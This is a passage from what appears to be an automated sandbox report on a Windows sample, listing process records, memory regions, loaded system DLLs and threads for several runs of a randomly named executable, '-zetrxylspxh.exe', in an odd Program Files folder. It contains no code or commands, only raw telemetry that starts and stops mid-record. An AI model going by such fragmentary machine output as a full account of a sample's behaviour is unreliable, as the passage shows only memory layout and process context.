"c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 4908 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4909 start_va = 0x830000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 4915 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 113 os_tid = 0x808 Thread: id = 138 os_tid = 0x7fc Process: id = "26" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd5c7000" os_pid = "0x12a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3960 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3961 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3962 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3963 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3964 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3965 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3966 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3967 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3968 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3969 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3970 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3971 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3972 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3973 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3974 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3975 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4146 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 4147 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4148 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4165 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4166 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4167 start_va = 0x440000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4168 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4169 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4170 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4171 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4172 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4546 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4547 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4548 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4549 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 4550 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4551 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4552 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4553 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4554 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4555 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4556 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4557 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4558 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4559 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4560 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4561 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4562 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4563 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4564 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4565 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4566 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4567 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4990 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5007 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5008 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5009 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 5010 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5487 start_va = 0x8f0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008f0000" filename = "" Region: id = 5488 start_va = 0x930000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Thread: id = 115 os_tid = 0x1294 Thread: id = 143 os_tid = 0x1328 Thread: id = 159 os_tid = 0xe9c Process: id = "27" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd425000" os_pid = "0x1240" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3985 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3986 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3987 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3988 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3989 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3990 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3991 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3992 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3993 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3994 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 3995 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3996 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3997 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3998 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3999 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4000 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4192 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 4193 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4194 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4195 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4212 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4213 start_va = 0x520000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 4214 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4215 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4595 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4596 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4597 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4598 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4599 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4600 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 4601 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4602 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4603 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4604 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4605 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4606 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4607 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4608 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4609 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4610 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4611 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4612 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4613 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4614 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4615 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4616 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4617 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4618 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5100 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5101 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5118 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5119 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 5120 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 116 os_tid = 0xb78 Thread: id = 144 os_tid = 0x8ac Thread: id = 178 os_tid = 0xb78 Process: id = "28" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x4dbd1000" os_pid = "0x880" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4009 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4010 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4011 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4012 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4013 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4014 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4015 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4016 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4017 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4018 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4019 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: 